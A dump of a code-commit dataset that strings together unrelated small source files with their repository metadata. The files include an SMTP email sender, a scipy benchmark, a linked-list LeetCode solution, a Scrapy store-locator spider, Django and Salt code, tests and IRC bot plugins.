# Informações da mensagem
destinatario = 'email-do-destinatario@qualquercoisa.com'
assunto = 'Enviando email com python'
texto = 'Esse email foi enviado usando python! :)'
# Preparando a mensagem
msg = '\r\n'.join([
'From: %s' % remetente,
'To: %s' % destinatario,
'Subject: %s' % assunto,
'',
'%s' % texto
])
# Enviando o email
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(remetente,senha)
server.sendmail(remetente, destinatario, msg)
server.quit()
| mit | Python | |
a11b064622f8dd56f76828f396d29072ece50ab9 | Add Python benchmark | stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/erfcinv/benchmark/python/benchmark.scipy.py | lib/node_modules/@stdlib/math/base/special/erfcinv/benchmark/python/benchmark.scipy.py | #!/usr/bin/env python
"""Benchmark scipy.special.erfcinv."""
import timeit
name = "erfcinv"
repeats = 3
iterations = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = iterations / elapsed
print(" ---")
print(" iterations: " + str(iterations))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from scipy.special import erfcinv; from random import random;"
stmt = "y = erfcinv(2.0*random() - 0.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in xrange(3):
print("# python::" + name)
elapsed = t.timeit(number=iterations)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(repeats, repeats)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
4582d020ec6fe8ef6035fc4a4de484f557f2d026 | Add 025 | ufjfeng/leetcode-jf-soln,ufjfeng/leetcode-jf-soln | python/025_reverse_nodes_in_k_group.py | python/025_reverse_nodes_in_k_group.py | """
Given a linked list, reverse the nodes of a linked list k at a time and return
its modified list.
If the number of nodes is not a multiple of k then left-out nodes in the end
should remain as it is.
You may not alter the values in the nodes, only nodes itself may be changed.
Only constant memory is allowed.
For example, Given this linked list: 1->2->3->4->5
For k = 2, you should return: 2->1->4->3->5
For k = 3, you should return: 3->2->1->4->5
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def reverseKGroup(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if head is None or k < 2:
return head
h = ListNode(None)
h.next = head
p = h
while p:
p = self.reverseNextK(p, k)
return h.next
def reverseNextK(self, p, k):
groupHead = p
for i in range(k):
if p.next:
p = p.next
else:
return None
firstNode = groupHead.next
prev = groupHead
curr = groupHead.next
for i in range(k):
nextNode = curr.next
curr.next = prev
prev = curr
curr = nextNode
firstNode.next = curr
groupHead.next = prev
return firstNode
| mit | Python | |
6e44d244a11664798be24a88681f37aad9b0329e | add url | palloc/face_t,palloc/face_t | backend-api/image_api/authapp/urls.py | backend-api/image_api/authapp/urls.py | # config: utf-8
from rest_framework import routers
from .views import *
router = routers.DefaultRouter()
router.register(r'faceimage', FaceImageViewSet)
| mit | Python | |
48bfe2d20cca35885ad0a460679d0a951d0c584e | Add spider for Giant Eagle | iandees/all-the-places,iandees/all-the-places,iandees/all-the-places | locations/spiders/gianteagle.py | locations/spiders/gianteagle.py | # -*- coding: utf-8 -*-
import json
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
1: "Su",
2: "Mo",
3: "Tu",
4: "We",
5: "Th",
6: "Fr",
7: "Sa"
}
class GiantEagleSpider(scrapy.Spider):
name = "gianteagle"
allowed_domains = ("www.gianteagle.com")
download_delay = 0.2
start_urls = (
'https://www.gianteagle.com/api/sitecore/locations/getlocationlistvm?q=&orderBy=geo.distance(storeCoordinate,%20geography%27POINT(-97.68194299999999%2030.2737366)%27)%20asc&skip=0',
)
items_per_page = 12 # api limit
def parse_hours(self, hours):
o = OpeningHours()
for h in hours:
day = DAY_MAPPING[h['DayNumber']]
open = h['Range'].get('Open')
close = h['Range'].get('Close')
if h['IsOpenedAllDay']:
open = '0:00'
close = '23:59'
elif h['IsClosedAllDay']:
continue
if open and close:
o.add_range(day=day,
open_time=open,
close_time=close)
return o.as_opening_hours()
def parse_address(self, address):
return ", ".join(filter(lambda x: True if x and x != '-' else False,
[address['address_no'], address['lineOne'], address['lineTwo']]))
def parse(self, response):
page_regex = re.compile(r'skip=(\d+)')
page = int(page_regex.search(response.url).group(1))
stores = json.loads(response.body_as_unicode())['Locations'] or []
for store in stores:
telephone = [t['DisplayNumber'] for t in store['TelephoneNumbers'] if t['location']['Item2'] == 'Main']
properties = dict(
ref=store['Number']['Value'],
name=store['Name'],
addr_full=self.parse_address(store['Address']),
lat=store['Address']['Coordinates']['Latitude'],
lon=store['Address']['Coordinates']['Longitude'],
country='US',
city=store['Address']['City'],
state=store['Address']['State']['Abbreviation'],
postcode=store['Address']['Zip'],
phone=telephone[0] if telephone else None,
opening_hours=self.parse_hours(store['HoursOfOperation']),
extras={
'number': store['Number']['Value'],
'display_name': store['StoreDisplayName']
}
)
yield GeojsonPointItem(**properties)
if stores:
page += self.items_per_page
yield scrapy.Request(url=page_regex.sub('skip={}'.format(page), response.url), dont_filter=True)
| mit | Python | |
d29e7ff4153ddcf616f8d03c08f6f95e3a348263 | Create command to calculate quantity of similar apps per app | bkosawa/admin-recommendation | crawler/management/commands/distribution_of_similar.py | crawler/management/commands/distribution_of_similar.py | import logging.config
from operator import or_
from django.core.management.base import BaseCommand
from crawler.models import *
logger = logging.getLogger('crawler.command')
class Command(BaseCommand):
help = 'Generate comparison between google similar app and ours'
def handle(self, *args, **options):
apps, similar_apps, similar_apps_count \
= self.my_similar_report('my_distribution.csv')
google_apps, google_similar_apps, google_similar_apps_count \
= self.google_similar_report('google_distribution.csv')
self.stdout.write(self.style.SUCCESS(
'Mine: {} apps and {} similar_apps from {}'.format(
len(apps), len(similar_apps), similar_apps_count)))
self.stdout.write(self.style.SUCCESS(
'Google: {} apps and {} similar_apps from {}'.format(
len(google_apps), len(google_similar_apps), google_similar_apps_count)))
@staticmethod
def my_similar_report(filename):
result_dict = dict()
similar_apps_count = SimilarApp.objects.count()
apps = SimilarApp.objects.order_by().values_list('source_package', flat=True).distinct()
similar_apps = SimilarApp.objects.order_by().values_list('similar_package', flat=True).distinct()
app_set = set(apps)
similar_set = set(similar_apps)
merged_set = reduce(or_, [app_set, similar_set])
for app in merged_set:
logger.debug('App: {}'.format(app))
my_similar_source = SimilarApp.objects.filter(source_package=app).all()
my_similar_similar = SimilarApp.objects.filter(similar_package=app).all()
my_similar = list(my_similar_source) + list(my_similar_similar)
if not my_similar:
continue
if not len(my_similar) in result_dict:
count = 0
else:
count = result_dict[len(my_similar)]
result_dict[len(my_similar)] = count + 1
logger.debug('Updated: {} with {}'.format(len(my_similar), count + 1))
admin_file = open(filename, 'w')
for key in result_dict:
admin_file.write('{};{}\n'.format(key, result_dict[key]))
admin_file.close()
return apps, similar_apps, similar_apps_count
@staticmethod
def google_similar_report(filename):
result_dict = dict()
similar_apps_count = GoogleSimilarApp.objects.count()
apps = GoogleSimilarApp.objects.order_by().values_list('source_package', flat=True).distinct()
similar_apps = GoogleSimilarApp.objects.order_by().values_list('similar_package', flat=True).distinct()
app_set = set(apps)
similar_set = set(similar_apps)
merged_set = reduce(or_, [app_set, similar_set])
for app in merged_set:
google_similar = GoogleSimilarApp.objects.filter(source_package=app).all()
if not google_similar:
continue
if not len(google_similar) in result_dict:
count = 0
else:
count = result_dict[len(google_similar)]
result_dict[len(google_similar)] = count + 1
logger.debug('Updated: {} with {}'.format(len(google_similar), count + 1))
admin_file = open(filename, 'w')
for key in result_dict:
admin_file.write('{};{}\n'.format(key, result_dict[key]))
admin_file.close()
return apps, similar_apps, similar_apps_count
| apache-2.0 | Python | |
023e88f264274211674a100820d590dcee694445 | Allow neutron network list to be used as pillar data | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | salt/pillar/neutron.py | salt/pillar/neutron.py | # -*- coding: utf-8 -*-
'''
Use Openstack Neutron data as a Pillar source. Will list all networks listed
inside of Neutron, to all minions.
.. versionadded:: Beryllium
:depends: - python-neutronclient
A keystone profile must be used for the pillar to work (no generic keystone
configuration here).
For example::
my openstack_config:
keystone.user: 'admin'
keystone.password: 'password'
keystone.tenant: 'admin'
keystone.auth_url: 'http://127.0.0.1:5000/v2.0/'
keystone.region_name: 'RegionOne'
keystone.service_type: 'network'
After the profile is created, configure the external pillar system to use it.
.. code-block:: yaml
ext_pillar:
- neutron: my_openstack_config
Using these configuration profiles, multiple neutron sources may also be used:
.. code-block:: yaml
ext_pillar:
- neutron: my_openstack_config
- neutron: my_other_openstack_config
By default, these networks will be returned as a pillar item called
``networks``. In order to have them returned under a different name, add the
name after the Keystone profile name:
ext_pillar:
- neutron: my_openstack_config neutron_networks
'''
# Import python libs
import logging
# Import third party libs
try:
import salt.utils.openstack.neutron as suoneu
HAS_NEUTRON = True
except NameError as exc:
HAS_NEUTRON = False
# Set up logging
log = logging.getLogger(__name__)
def __virtual__():
'''
Only return if python-neutronclient is installed
'''
return HAS_NEUTRON
def _auth(profile=None):
'''
Set up neutron credentials
'''
credentials = __salt__['config.option'](profile)
kwargs = {
'username': credentials['keystone.user'],
'password': credentials['keystone.password'],
'tenant_name': credentials['keystone.tenant'],
'auth_url': credentials['keystone.auth_url'],
'region_name': credentials.get('keystone.region_name', None),
'service_type': credentials['keystone.service_type'],
}
return suoneu.SaltNeutron(**kwargs)
def ext_pillar(minion_id,
pillar, # pylint: disable=W0613
conf):
'''
Check neutron for all data
'''
comps = conf.split()
profile = None
if comps[0]:
profile = comps[0]
conn = _auth(profile)
ret = {}
networks = conn.list_networks()
for network in networks['networks']:
ret[network['name']] = network
if len(comps) < 2:
comps.append('networks')
return {comps[1]: ret}
| apache-2.0 | Python | |
6df4cdd8fe629fabadd792d0b7507a57f9dc37b7 | refactor tests | sumit12dec/pyquora,iammxt/pyquora,rohithpr/pyquora | tests/test_helper_functions.py | tests/test_helper_functions.py | import quora
class TestHelperFunctions:
def test_try_cast_int(self):
input_strings = ['200 Upvotes', '2k Upvotes', '2 K Upvotes', '2.3k Upvotes', '2.3 K Upvotes', '<span class="count">3</span>']
expected = [200, 2000, 2000, 2300, 2300, 3]
for i in range(0, len(input_strings)):
assert quora.try_cast_int(input_strings[i]) == expected[i] | import quora
def test_try_cast_int():
assert quora.try_cast_int('200 Upvotes') == 200
assert quora.try_cast_int('2k Upvotes') == 2000
assert quora.try_cast_int('2 K Upvotes') == 2000
assert quora.try_cast_int('2.3k Upvotes') == 2300
assert quora.try_cast_int('2.3 K Upvotes') == 2300
assert quora.try_cast_int('<span class="count">3</span>') == 3
test_try_cast_int() | agpl-3.0 | Python |
2b0ade5407902c2b8d8a0853967bbe01c9e38e7e | test file for paraview functions | PMEAL/OpenPNM | tests/unit/io/test_paraview.py | tests/unit/io/test_paraview.py | import os
import sys
import pytest
import numpy as np
import porespy as ps
import openpnm as op
from numpy.testing import assert_allclose
import psutil
from openpnm.io.__paraview__ import export_data
from openpnm.io.__paraview__ import open_paraview
class ExportTest():
def setup_class(self):
self.path = os.path.dirname(os.path.abspath(sys.argv[0]))
def test_export_data(self):
im = ps.generators.blobs(shape=[50, 50, 50], spacing=0.1)
export_data(im=im, filename='test_to_paraview.pvsm')
os.remove('test_to_paraview.pvsm')
def test_open_paraview(self):
open_paraview(filename='../fixtures/image.pvsm')
if sys.platform != "darwin":
assert "paraview" in (p.name().split('.')[0] for p in psutil.process_iter())
if __name__ == "__main__":
t = ExportTest()
self = t
t.setup_class()
for item in t.__dir__():
if item.startswith("test"):
print(f"Running test: {item}")
t.__getattribute__(item)()
| mit | Python | |
1f281a1279b7b185559d9d267a69ea24024c633e | Transpose of a Matrix | ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms,ZoranPandovski/al-go-rithms | math/Matrix/Python/transpose.py | math/Matrix/Python/transpose.py | """ Transpose of a Matrix
Following is a simpler code for Transpose
of a matrix using the NUMPY library of Python.
The transpose of a matrix swaps its rows and columns:
[[a,b,c],
[d,e,f]]
Would be written as :
[[a,d],
[b,e],
[c,f]]
This comes in extensive use when we matrices in ML. """
import numpy as np
# We have imported the NUMPY library using above SYNTAX.
def Transpose(mat):
# Here we create a function Transpose.
arr=np.array(mat)
# We convert the incoming matrix in an array form using np.array() function.
a=arr.T
# Here we just use the inbuild function of the NUMPY library.
return a
""" Let us declare a matrix and we will see the output
>>>mat=[[1,2,3],
[4,5,6]]
>>>print(Transpose(mat))
OUTPUT:
>>>
[[1 4]
[2 5]
[3 6]]
>>>mat=[['a','b','c'],
['d','e','f']]
>>>print(Transpose(mat))
OUTPUT:
>>>
[['a' 'd']
['b' 'e']
['c' 'f']]
"""
| cc0-1.0 | Python | |
bf98a5d06436a905aa5710db4a60f1e6b7c8f7fc | Add link local plugin | Daksh/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,quozl/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit,tchx84/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,ceibal-tatu/sugar-toolkit,puneetgkaur/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,gusDuarte/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,i5o/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,godiard/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,Daksh/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3 | services/presence2/linklocal_plugin.py | services/presence2/linklocal_plugin.py | # Copyright (C) 2007, Red Hat, Inc.
# Copyright (C) 2007, Collabora Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gobject
class LinkLocalPlugin(gobject.GObject):
def __init__(self, registry):
gobject.GObject.__init__(self)
self._registry = registry
| lgpl-2.1 | Python | |
2ab796aeb53e650b8a1dd828b5daaca16850d9c3 | Add tests for APNS message. | hackerkid/zulip,ahmadassaf/zulip,vaidap/zulip,peguin40/zulip,AZtheAsian/zulip,dhcrzf/zulip,brainwane/zulip,ahmadassaf/zulip,rishig/zulip,sharmaeklavya2/zulip,dattatreya303/zulip,calvinleenyc/zulip,jphilipsen05/zulip,j831/zulip,sonali0901/zulip,eeshangarg/zulip,synicalsyntax/zulip,jrowan/zulip,punchagan/zulip,verma-varsha/zulip,vabs22/zulip,mohsenSy/zulip,rishig/zulip,rishig/zulip,cosmicAsymmetry/zulip,Juanvulcano/zulip,ahmadassaf/zulip,punchagan/zulip,sup95/zulip,shubhamdhama/zulip,mahim97/zulip,Juanvulcano/zulip,kou/zulip,cosmicAsymmetry/zulip,dhcrzf/zulip,rht/zulip,j831/zulip,susansls/zulip,niftynei/zulip,calvinleenyc/zulip,hackerkid/zulip,Galexrt/zulip,tommyip/zulip,jainayush975/zulip,grave-w-grave/zulip,dhcrzf/zulip,blaze225/zulip,Jianchun1/zulip,dhcrzf/zulip,hackerkid/zulip,umkay/zulip,reyha/zulip,tommyip/zulip,paxapy/zulip,jackrzhang/zulip,souravbadami/zulip,krtkmj/zulip,rishig/zulip,susansls/zulip,grave-w-grave/zulip,verma-varsha/zulip,amanharitsh123/zulip,kou/zulip,vaidap/zulip,umkay/zulip,sonali0901/zulip,susansls/zulip,vaidap/zulip,vikas-parashar/zulip,timabbott/zulip,isht3/zulip,souravbadami/zulip,aakash-cr7/zulip,kou/zulip,brainwane/zulip,JPJPJPOPOP/zulip,mahim97/zulip,reyha/zulip,shubhamdhama/zulip,kou/zulip,christi3k/zulip,jphilipsen05/zulip,aakash-cr7/zulip,umkay/zulip,jrowan/zulip,krtkmj/zulip,mohsenSy/zulip,tommyip/zulip,andersk/zulip,sup95/zulip,sup95/zulip,verma-varsha/zulip,Diptanshu8/zulip,peguin40/zulip,isht3/zulip,mohsenSy/zulip,christi3k/zulip,jackrzhang/zulip,KingxBanana/zulip,vabs22/zulip,andersk/zulip,vabs22/zulip,dawran6/zulip,andersk/zulip,AZtheAsian/zulip,Galexrt/zulip,Juanvulcano/zulip,KingxBanana/zulip,brockwhittaker/zulip,dawran6/zulip,punchagan/zulip,jrowan/zulip,jphilipsen05/zulip,brainwane/zulip,samatdav/zulip,blaze225/zulip,brainwane/zulip,jainayush975/zulip,calvinleenyc/zulip,isht3/zulip,amyliu345/zulip,eeshangarg/zulip,synicalsyntax/zulip,vikas-parashar/zulip,synicalsyntax/zulip,Diptanshu8/zulip,dawran6/zulip,vikas-parashar/zulip,amanharitsh123/zulip,j831/zulip,peguin40/zulip,isht3/zulip,KingxBanana/zulip,brockwhittaker/zulip,SmartPeople/zulip,ryanbackman/zulip,sup95/zulip,blaze225/zulip,souravbadami/zulip,mahim97/zulip,brainwane/zulip,TigorC/zulip,TigorC/zulip,shubhamdhama/zulip,timabbott/zulip,blaze225/zulip,amanharitsh123/zulip,niftynei/zulip,vaidap/zulip,ryanbackman/zulip,KingxBanana/zulip,zacps/zulip,vikas-parashar/zulip,ahmadassaf/zulip,calvinleenyc/zulip,jackrzhang/zulip,zulip/zulip,synicalsyntax/zulip,krtkmj/zulip,jphilipsen05/zulip,rht/zulip,joyhchen/zulip,joyhchen/zulip,sharmaeklavya2/zulip,tommyip/zulip,zacps/zulip,cosmicAsymmetry/zulip,paxapy/zulip,grave-w-grave/zulip,brainwane/zulip,rht/zulip,rht/zulip,christi3k/zulip,sonali0901/zulip,jackrzhang/zulip,JPJPJPOPOP/zulip,showell/zulip,JPJPJPOPOP/zulip,umkay/zulip,timabbott/zulip,arpith/zulip,zulip/zulip,SmartPeople/zulip,sup95/zulip,showell/zulip,amanharitsh123/zulip,aakash-cr7/zulip,zacps/zulip,KingxBanana/zulip,TigorC/zulip,blaze225/zulip,joyhchen/zulip,arpith/zulip,rishig/zulip,sharmaeklavya2/zulip,eeshangarg/zulip,Jianchun1/zulip,aakash-cr7/zulip,jrowan/zulip,timabbott/zulip,dhcrzf/zulip,reyha/zulip,joyhchen/zulip,Juanvulcano/zulip,dawran6/zulip,niftynei/zulip,andersk/zulip,sharmaeklavya2/zulip,amyliu345/zulip,punchagan/zulip,arpith/zulip,SmartPeople/zulip,paxapy/zulip,jainayush975/zulip,hackerkid/zulip,arpith/zulip,rishig/zulip,Diptanshu8/zulip,sharmaeklavya2/zulip,andersk/zulip,hackerkid/zulip,mohsenSy/zulip,dattatreya303/zulip,Diptanshu8/zulip,niftynei/zulip,krtkmj/zulip,jrowan/zulip,punchagan/zulip,vaidap/zulip,calvinleenyc/zulip,synicalsyntax/zulip,Jianchun1/zulip,zulip/zulip,eeshangarg/zulip,cosmicAsymmetry/zulip,grave-w-grave/zulip,souravbadami/zulip,jphilipsen05/zulip,eeshangarg/zulip,vabs22/zulip,mohsenSy/zulip,dattatreya303/zulip,AZtheAsian/zulip,SmartPeople/zulip,vikas-parashar/zulip,joyhchen/zulip,niftynei/zulip,arpith/zulip,Juanvulcano/zulip,Galexrt/zulip,dhcrzf/zulip,umkay/zulip,brockwhittaker/zulip,hackerkid/zulip,susansls/zulip,ahmadassaf/zulip,zacps/zulip,timabbott/zulip,Diptanshu8/zulip,samatdav/zulip,ryanbackman/zulip,isht3/zulip,rht/zulip,amyliu345/zulip,mahim97/zulip,SmartPeople/zulip,verma-varsha/zulip,PhilSk/zulip,dawran6/zulip,reyha/zulip,zulip/zulip,AZtheAsian/zulip,ahmadassaf/zulip,kou/zulip,zulip/zulip,jackrzhang/zulip,samatdav/zulip,Galexrt/zulip,PhilSk/zulip,grave-w-grave/zulip,verma-varsha/zulip,showell/zulip,dattatreya303/zulip,synicalsyntax/zulip,j831/zulip,andersk/zulip,mahim97/zulip,paxapy/zulip,sonali0901/zulip,timabbott/zulip,showell/zulip,KingxBanana/zulip,dawran6/zulip,PhilSk/zulip,aakash-cr7/zulip,Jianchun1/zulip,krtkmj/zulip,hackerkid/zulip,souravbadami/zulip,vikas-parashar/zulip,arpith/zulip,christi3k/zulip,dattatreya303/zulip,brockwhittaker/zulip,reyha/zulip,calvinleenyc/zulip,christi3k/zulip,timabbott/zulip,grave-w-grave/zulip,sonali0901/zulip,umkay/zulip,zacps/zulip,TigorC/zulip,eeshangarg/zulip,amanharitsh123/zulip,punchagan/zulip,amyliu345/zulip,mahim97/zulip,samatdav/zulip,showell/zulip,PhilSk/zulip,niftynei/zulip,Galexrt/zulip,zacps/zulip,dattatreya303/zulip,peguin40/zulip,zulip/zulip,Jianchun1/zulip,joyhchen/zulip,vabs22/zulip,tommyip/zulip,blaze225/zulip,krtkmj/zulip,Galexrt/zulip,jackrzhang/zulip,vabs22/zulip,jainayush975/zulip,Diptanshu8/zulip,rht/zulip,ryanbackman/zulip,TigorC/zulip,andersk/zulip,PhilSk/zulip,samatdav/zulip,susansls/zulip,peguin40/zulip,umkay/zulip,peguin40/zulip,j831/zulip,souravbadami/zulip,sup95/zulip,Galexrt/zulip,zulip/zulip,JPJPJPOPOP/zulip,cosmicAsymmetry/zulip,paxapy/zulip,showell/zulip,cosmicAsymmetry/zulip,susansls/zulip,shubhamdhama/zulip,TigorC/zulip,kou/zulip,j831/zulip,sonali0901/zulip,showell/zulip,amanharitsh123/zulip,brainwane/zulip,tommyip/zulip,paxapy/zulip,brockwhittaker/zulip,synicalsyntax/zulip,jrowan/zulip,AZtheAsian/zulip,ryanbackman/zulip,amyliu345/zulip,rishig/zulip,jphilipsen05/zulip,jainayush975/zulip,shubhamdhama/zulip,amyliu345/zulip,SmartPeople/zulip,reyha/zulip,eeshangarg/zulip,ahmadassaf/zulip,isht3/zulip,dhcrzf/zulip,punchagan/zulip,aakash-cr7/zulip,JPJPJPOPOP/zulip,jainayush975/zulip,sharmaeklavya2/zulip,PhilSk/zulip,vaidap/zulip,ryanbackman/zulip,JPJPJPOPOP/zulip,tommyip/zulip,Juanvulcano/zulip,AZtheAsian/zulip,christi3k/zulip,shubhamdhama/zulip,mohsenSy/zulip,brockwhittaker/zulip,samatdav/zulip,krtkmj/zulip,jackrzhang/zulip,kou/zulip,verma-varsha/zulip,Jianchun1/zulip,shubhamdhama/zulip,rht/zulip | zerver/tests/test_push_notifications.py | zerver/tests/test_push_notifications.py | import mock
from django.test import TestCase
from django.conf import settings
from zerver.models import PushDeviceToken, UserProfile
from zerver.models import get_user_profile_by_email
from zerver.lib import push_notifications as apn
from zerver.lib.redis_utils import get_redis_client
class PushNotificationTest(TestCase):
def setUp(self):
email = 'hamlet@zulip.com'
self.redis_client = get_redis_client()
apn.connection = apn.get_connection('fake-cert', 'fake-key')
apn.dbx_connection = apn.get_connection('fake-cert', 'fake-key')
self.user_profile = get_user_profile_by_email(email)
self.tokens = ['aaaa', 'bbbb']
for token in self.tokens:
PushDeviceToken.objects.create(
kind=PushDeviceToken.APNS,
token=apn.hex_to_b64(token),
user=self.user_profile,
ios_app_id=settings.ZULIP_IOS_APP_ID)
def tearDown(self):
for i in [100, 200]:
self.redis_client.delete(apn.get_apns_key(i))
class APNsMessageTest(PushNotificationTest):
@mock.patch('random.getrandbits', side_effect=[100, 200])
def test_apns_message(self, mock_getrandbits):
apn.APNsMessage(self.user_profile, self.tokens, alert="test")
data = self.redis_client.hgetall(apn.get_apns_key(100))
self.assertEqual(data['token'], 'aaaa')
self.assertEqual(int(data['user_id']), self.user_profile.id)
data = self.redis_client.hgetall(apn.get_apns_key(200))
self.assertEqual(data['token'], 'bbbb')
self.assertEqual(int(data['user_id']), self.user_profile.id)
| apache-2.0 | Python | |
6064180a636ecbf5e25742b87fe1f2365ea1e8b5 | add controlchar plugin | melmothx/jsonbot,melmothx/jsonbot,melmothx/jsonbot | commonplugs/controlchar.py | commonplugs/controlchar.py | # commonplugs/controlchar.pu
#
#
"""
command to control the control (command) characters. The cc is a string
containing the allowed control characters.
"""
from gozerlib.commands import cmnds
from gozerlib.examples import examples
def handle_cc(bot, ievent):
""" cc [<controlchar>] .. set/get control character of channel. """
try:
what = ievent.args[0]
if not bot.users.allowed(ievent.userhost, 'OPER'):
return
if len(what) > 1:
ievent.reply("only one character is allowed")
return
try:
ievent.chan.data.cc = what
except (KeyError, TypeError):
ievent.reply("no channel %s in database" % chan)
return
ievent.chan.save()
ievent.reply('control char set to %s' % what)
except IndexError:
# no argument given .. show cc of channel command is given in
try:
cchar = ievent.chan.data.cc
ievent.reply('control character(s) for channel %s are/is %s' % (ievent.channel, cchar))
except (KeyError, TypeError):
ievent.reply("default cc is %s" % bot.cfg['defaultcc'])
cmnds.add('cc', handle_cc, 'USER')
examples.add('cc', 'set control char of channel or show control char of channel','1) cc ! 2) cc')
def handle_ccadd(bot, ievent):
""" add a control char to the channels cc list. """
try:
what = ievent.args[0]
if not bot.users.allowed(ievent.userhost, 'OPER'):
return
if len(what) > 1:
ievent.reply("only one character is allowed")
return
try:
ievent.chan.data.cc += what
except (KeyError, TypeError):
ievent.reply("no channel %s in database" % chan)
return
ievent.chan.save()
ievent.reply('control char %s added' % what)
except IndexError:
ievent.missing('<cc> [<channel>]')
cmnds.add('cc-add', handle_ccadd, 'OPER', allowqueue=False)
examples.add('cc-add', 'cc-add <control char> .. add control character', 'cc-add #')
def handle_ccdel(bot, ievent):
""" remove a control char from the channels cc list. """
try:
what = ievent.args[0]
if not bot.users.allowed(ievent.userhost, 'OPER'):
return
if len(what) > 1:
ievent.reply("only one character is allowed")
return
try:
ievent.chan.data.cc = event.chan.data.cc.replace(what, '')
except KeyError:
ievent.reply("no channel %s in database")
return
except TypeError:
ievent.reply("no channel %s in database" % chan)
return
ievent.chan.save()
ievent.reply('control char %s deleted' % what)
except IndexError:
ievent.missing('<cc> [<channel>]')
cmnds.add('cc-del', handle_ccdel, 'OPER')
examples.add('cc-del', 'cc-del <control character> .. remove cc', 'cc-del #')
| mit | Python | |
f491db91ed2608698d2d91558f41f544819684bf | Add python-copy to calvinsys | les69/calvin-base,les69/calvin-base,EricssonResearch/calvin-base,les69/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base,les69/calvin-base | calvin/calvinsys/native/python-copy.py | calvin/calvinsys/native/python-copy.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import types
class Copy(object):
_copy = {
name: getattr(copy, name)
for name in dir(copy) if not name.startswith('_') and isinstance(getattr(copy, name), types.FunctionType)
}
def __getattr__(self, attr):
